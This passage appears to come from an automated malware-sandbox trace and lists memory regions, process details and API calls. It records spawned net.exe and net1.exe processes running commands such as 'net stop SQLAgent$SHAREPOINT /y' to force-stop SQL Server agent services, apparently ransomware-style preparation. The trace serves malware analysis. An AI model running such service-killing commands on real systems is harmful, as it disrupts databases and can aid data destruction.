0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10091 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 10092 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10093 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 764 os_tid = 0x102c Process: id = "275" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5b658000" os_pid = "0x1158" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLAgent$SHAREPOINT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10094 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10095 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10096 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10097 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 10098 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10099 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10100 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10101 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 10102 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10103 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10104 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 10105 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10106 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10107 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10108 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 766 os_tid = 0x1100 Process: id = "276" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5a516000" os_pid = "0x10bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "271" os_parent_pid = "0xfec" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$PRACTTICEBGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10109 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10110 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10111 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10112 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 10113 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10114 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10115 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10116 start_va = 0xff700000 end_va = 0xff732fff entry_point = 0xff700000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 10117 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10118 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10119 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 10120 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10121 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 10122 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10123 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10202 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10203 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10204 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10205 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 10206 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 10207 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 10208 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 10209 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 10210 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 10211 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 10212 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 10213 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 10214 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 10215 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 10216 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 10217 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 10218 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 10219 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10220 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10221 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 10222 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 10223 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10224 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10225 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 768 os_tid = 0x11a4 [0111.246] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfb90 | out: lpSystemTimeAsFileTime=0xcfb90*(dwLowDateTime=0xf773ccf0, dwHighDateTime=0x1d48689)) [0111.246] GetCurrentProcessId () returned 0x10bc [0111.247] GetCurrentThreadId () returned 0x11a4 [0111.247] GetTickCount () returned 0x2585c [0111.247] QueryPerformanceCounter (in: lpPerformanceCount=0xcfb98 | out: lpPerformanceCount=0xcfb98*=1815816500000) returned 1 [0111.248] GetModuleHandleW (lpModuleName=0x0) returned 0xff700000 [0111.248] __set_app_type (_Type=0x1) [0111.248] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff719c9c) returned 0x0 [0111.249] __getmainargs (in: _Argc=0xff724780, _Argv=0xff724790, _Env=0xff724788, _DoWildCard=0, _StartInfo=0xff72479c | out: _Argc=0xff724780, _Argv=0xff724790, _Env=0xff724788) returned 0 [0111.249] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0111.249] GetConsoleOutputCP () returned 0x1b5 [0111.249] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff72cec0 | out: lpCPInfo=0xff72cec0) returned 1 [0111.249] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0111.251] sprintf_s (in: _DstBuf=0xcfb38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0111.252] setlocale (category=0, locale=".437") returned="English_United States.437" [0111.253] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.253] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0111.253] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$PRACTTICEBGC /y" [0111.253] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcf8d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0111.254] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0111.254] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcfb28 | out: Buffer=0xcfb28*=0x224d60) returned 0x0 [0111.254] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcfb28 | out: Buffer=0xcfb28*=0x22c130) returned 0x0 [0111.254] _fileno (_File=0x7fefdba2a80) returned 0 [0111.254] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0111.254] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0111.254] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0111.254] _wcsicmp (_String1="config", _String2="stop") returned -16 [0111.254] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0111.254] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0111.255] _wcsicmp (_String1="file", _String2="stop") returned -13 [0111.255] _wcsicmp (_String1="files", _String2="stop") returned -13 [0111.255] _wcsicmp (_String1="group", _String2="stop") returned -12 [0111.255] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0111.255] _wcsicmp (_String1="help", _String2="stop") returned -11 [0111.255] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0111.255] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0111.255] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0111.255] _wcsicmp (_String1="session", _String2="stop") returned -15 [0111.255] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0111.255] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0111.255] _wcsicmp (_String1="share", _String2="stop") returned -12 [0111.255] _wcsicmp (_String1="start", _String2="stop") returned -14 [0111.255] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0111.255] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0111.255] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0111.255] _wcsicmp (_String1="accounts", _String2="SQLAgent$PRACTTICEBGC") returned -18 [0111.255] _wcsicmp (_String1="computer", _String2="SQLAgent$PRACTTICEBGC") returned -16 [0111.255] _wcsicmp (_String1="config", _String2="SQLAgent$PRACTTICEBGC") returned -16 [0111.255] _wcsicmp (_String1="continue", _String2="SQLAgent$PRACTTICEBGC") returned -16 [0111.256] _wcsicmp (_String1="cont", _String2="SQLAgent$PRACTTICEBGC") returned -16 [0111.256] _wcsicmp (_String1="file", _String2="SQLAgent$PRACTTICEBGC") returned -13 [0111.256] _wcsicmp (_String1="files", _String2="SQLAgent$PRACTTICEBGC") returned -13 [0111.256] _wcsicmp (_String1="group", _String2="SQLAgent$PRACTTICEBGC") returned -12 [0111.256] _wcsicmp (_String1="groups", _String2="SQLAgent$PRACTTICEBGC") returned -12 [0111.256] _wcsicmp (_String1="help", _String2="SQLAgent$PRACTTICEBGC") returned -11 [0111.256] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$PRACTTICEBGC") returned -11 [0111.256] _wcsicmp (_String1="localgroup", _String2="SQLAgent$PRACTTICEBGC") returned -7 [0111.256] _wcsicmp (_String1="pause", _String2="SQLAgent$PRACTTICEBGC") returned -3 [0111.256] _wcsicmp (_String1="session", _String2="SQLAgent$PRACTTICEBGC") returned -12 [0111.256] _wcsicmp (_String1="sessions", _String2="SQLAgent$PRACTTICEBGC") returned -12 [0111.256] _wcsicmp (_String1="sess", _String2="SQLAgent$PRACTTICEBGC") returned -12 [0111.256] _wcsicmp (_String1="share", _String2="SQLAgent$PRACTTICEBGC") returned -9 [0111.256] _wcsicmp (_String1="start", _String2="SQLAgent$PRACTTICEBGC") returned 3 [0111.256] _wcsicmp (_String1="stats", _String2="SQLAgent$PRACTTICEBGC") returned 3 [0111.256] _wcsicmp (_String1="statistics", _String2="SQLAgent$PRACTTICEBGC") returned 3 [0111.256] _wcsicmp (_String1="stop", _String2="SQLAgent$PRACTTICEBGC") returned 3 [0111.256] _wcsicmp (_String1="time", _String2="SQLAgent$PRACTTICEBGC") returned 1 [0111.256] _wcsicmp (_String1="user", _String2="SQLAgent$PRACTTICEBGC") returned 2 [0111.256] _wcsicmp (_String1="users", _String2="SQLAgent$PRACTTICEBGC") returned 2 [0111.256] _wcsicmp (_String1="msg", _String2="SQLAgent$PRACTTICEBGC") returned -6 [0111.257] _wcsicmp (_String1="messenger", _String2="SQLAgent$PRACTTICEBGC") returned -6 [0111.257] _wcsicmp (_String1="receiver", _String2="SQLAgent$PRACTTICEBGC") returned -1 [0111.257] _wcsicmp (_String1="rcv", _String2="SQLAgent$PRACTTICEBGC") returned -1 [0111.257] _wcsicmp (_String1="netpopup", _String2="SQLAgent$PRACTTICEBGC") returned -5 [0111.257] _wcsicmp (_String1="redirector", _String2="SQLAgent$PRACTTICEBGC") returned -1 [0111.257] _wcsicmp (_String1="redir", _String2="SQLAgent$PRACTTICEBGC") returned -1 [0111.257] _wcsicmp (_String1="rdr", _String2="SQLAgent$PRACTTICEBGC") returned -1 [0111.257] _wcsicmp (_String1="workstation", _String2="SQLAgent$PRACTTICEBGC") returned 4 [0111.257] _wcsicmp (_String1="work", _String2="SQLAgent$PRACTTICEBGC") returned 4 [0111.257] _wcsicmp (_String1="wksta", _String2="SQLAgent$PRACTTICEBGC") returned 4 [0111.257] _wcsicmp (_String1="prdr", _String2="SQLAgent$PRACTTICEBGC") returned -3 [0111.257] _wcsicmp (_String1="devrdr", _String2="SQLAgent$PRACTTICEBGC") returned -15 [0111.257] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$PRACTTICEBGC") returned -7 [0111.257] _wcsicmp (_String1="server", _String2="SQLAgent$PRACTTICEBGC") returned -12 [0111.257] _wcsicmp (_String1="svr", _String2="SQLAgent$PRACTTICEBGC") returned 5 [0111.257] _wcsicmp (_String1="srv", _String2="SQLAgent$PRACTTICEBGC") returned 1 [0111.257] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$PRACTTICEBGC") returned -7 [0111.257] _wcsicmp (_String1="alerter", _String2="SQLAgent$PRACTTICEBGC") returned -18 [0111.257] _wcsicmp (_String1="netlogon", _String2="SQLAgent$PRACTTICEBGC") returned -5 [0111.258] _wcsupr (in: _String="SQLAgent$PRACTTICEBGC" | out: _String="SQLAGENT$PRACTTICEBGC") returned="SQLAGENT$PRACTTICEBGC" [0111.258] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x22ce40 [0111.263] GetServiceKeyNameW (in: hSCManager=0x22ce40, lpDisplayName="SQLAGENT$PRACTTICEBGC", lpServiceName=0xff725750, lpcchBuffer=0xcfa48 | out: lpServiceName="", lpcchBuffer=0xcfa48) returned 0 [0111.264] _wcsicmp (_String1="msg", _String2="SQLAGENT$PRACTTICEBGC") returned -6 [0111.264] _wcsicmp (_String1="messenger", _String2="SQLAGENT$PRACTTICEBGC") returned -6 [0111.264] _wcsicmp (_String1="receiver", _String2="SQLAGENT$PRACTTICEBGC") returned -1 [0111.264] _wcsicmp (_String1="rcv", _String2="SQLAGENT$PRACTTICEBGC") returned -1 [0111.264] _wcsicmp (_String1="redirector", _String2="SQLAGENT$PRACTTICEBGC") returned -1 [0111.264] _wcsicmp (_String1="redir", _String2="SQLAGENT$PRACTTICEBGC") returned -1 [0111.264] _wcsicmp (_String1="rdr", _String2="SQLAGENT$PRACTTICEBGC") returned -1 [0111.264] _wcsicmp (_String1="workstation", _String2="SQLAGENT$PRACTTICEBGC") returned 4 [0111.264] _wcsicmp (_String1="work", _String2="SQLAGENT$PRACTTICEBGC") returned 4 [0111.264] _wcsicmp (_String1="wksta", _String2="SQLAGENT$PRACTTICEBGC") returned 4 [0111.264] _wcsicmp (_String1="prdr", _String2="SQLAGENT$PRACTTICEBGC") returned -3 [0111.264] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$PRACTTICEBGC") returned -15 [0111.264] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$PRACTTICEBGC") returned -7 [0111.265] _wcsicmp (_String1="server", _String2="SQLAGENT$PRACTTICEBGC") returned -12 [0111.265] _wcsicmp (_String1="svr", _String2="SQLAGENT$PRACTTICEBGC") returned 5 [0111.265] _wcsicmp (_String1="srv", _String2="SQLAGENT$PRACTTICEBGC") returned 1 [0111.265] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$PRACTTICEBGC") returned -7 [0111.265] _wcsicmp (_String1="alerter", _String2="SQLAGENT$PRACTTICEBGC") returned -18 [0111.265] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$PRACTTICEBGC") returned -5 [0111.265] NetServiceControl (in: servername=0x0, service="SQLAGENT$PRACTTICEBGC", opcode=0x0, arg=0x0, bufptr=0xcfa50 | out: bufptr=0xcfa50) returned 0x889 [0111.266] wcscpy_s (in: _Destination=0xff7280d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0111.266] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0111.267] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff725b50, nSize=0x800, Arguments=0xff727f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0111.269] GetFileType (hFile=0xb) returned 0x2 [0111.269] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf918 | out: lpMode=0xcf918) returned 1 [0111.269] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff725b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xcf910, lpReserved=0x0 | out: lpBuffer=0xff725b50*, lpNumberOfCharsWritten=0xcf910*=0x1e) returned 1 [0111.270] GetFileType (hFile=0xb) returned 0x2 [0111.270] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf918 | out: lpMode=0xcf918) returned 1 [0111.270] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff701efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcf910, lpReserved=0x0 | out: lpBuffer=0xff701efc*, lpNumberOfCharsWritten=0xcf910*=0x2) returned 1 [0111.270] _ultow (in: _Dest=0x889, _Radix=850304 | out: _Dest=0x889) returned="2185" [0111.270] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff725b50, nSize=0x800, Arguments=0xff727f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0111.271] GetFileType (hFile=0xb) returned 0x2 [0111.271] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf918 | out: lpMode=0xcf918) returned 1 [0111.271] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff725b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xcf910, lpReserved=0x0 | out: lpBuffer=0xff725b50*, lpNumberOfCharsWritten=0xcf910*=0x34) returned 1 [0111.272] GetFileType (hFile=0xb) returned 0x2 [0111.272] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf918 | out: lpMode=0xcf918) returned 1 [0111.272] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff701efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcf910, lpReserved=0x0 | out: lpBuffer=0xff701efc*, lpNumberOfCharsWritten=0xcf910*=0x2) returned 1 [0111.273] NetApiBufferFree (Buffer=0x224d60) returned 0x0 [0111.273] NetApiBufferFree (Buffer=0x22c130) returned 0x0 [0111.273] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$PRACTTICEBGC /y" [0111.273] exit (_Code=2) Process: id = "277" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x58e40000" os_pid = "0x113c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "272" os_parent_pid = "0xfb0" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$PRACTTICEMGT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10124 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10125 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10126 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10127 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 10128 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10129 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10130 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10131 start_va = 0xff700000 end_va = 0xff732fff entry_point = 0xff700000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 10132 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10133 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10134 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 10135 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 10136 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 10137 start_va = 0x77550000 end_va = 0x7766efff entry_point = 